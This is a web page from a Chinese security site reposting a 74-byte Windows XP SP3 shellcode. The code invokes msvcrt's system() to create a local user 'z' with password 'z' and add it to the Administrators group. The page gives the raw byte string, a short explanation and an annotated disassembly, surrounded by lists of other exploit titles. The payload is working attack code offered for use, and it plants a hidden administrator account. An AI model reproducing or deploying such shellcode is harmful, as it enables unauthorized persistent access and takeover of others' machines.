首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
win32/xp sp3 (ru) add local administrator in 74 bytes
来源:vfocus.net 作者:vfocus 发布时间:2010-10-18  
win32/xp sp3 (ru) add local administrator in 74 bytes

"\xEB\x08\xB8\xC7\x93\xC1\x77\xFF\xD0\xCC\xE8\xF3\xFF\xFF\xFFcmd /cnet/add user z z&net/add localgroup Administrators z"

At first we jump to make call push address of our command-string in stack and then execute it with system() function.

You'd better check its address on your machine, before running. BP is used to prevent infinite looping.
The command is slightly optimized, to save something near 10 bytes od space.
The result - you get z:z user with Administrative priveleges. The last zero byte is essential.      

xxx:    EB 08        jmp xxx+0A         ; the magic begins
xxx+02: B8 C793C177  mov eax,77C193C7   ; \ call msvcrt.system
        FF D0        call eax           ; /
        CC           int 3              ; pause ;)
xxx+0A: E8 F3FFFFFF  call xxx+02        ; push xxx+0F
xxx+0F: db 'cmd /cnet/add user z z&net/add localgroup Administrators z',0


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DJ Legend 6.01 Denial of Servi
·GNU C library dynamic linker $
·Opera v10.63 SVG animation Ele
·FatPlayer 0.6b Malicious WAV B
·Kisisel Radyo Script - Multipl
·Hanso Converter 1.1.0 .ogg Den
·Novel eDirectory DHost Console
·Linux RDS Protocol Local Privi
·Windows NTLM Weak Nonce Vulner
·Oracle Sun Java System Web Ser
·MS10-070 ASP.NET Padding Oracl
·Oracle Siebel eBusiness Applic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved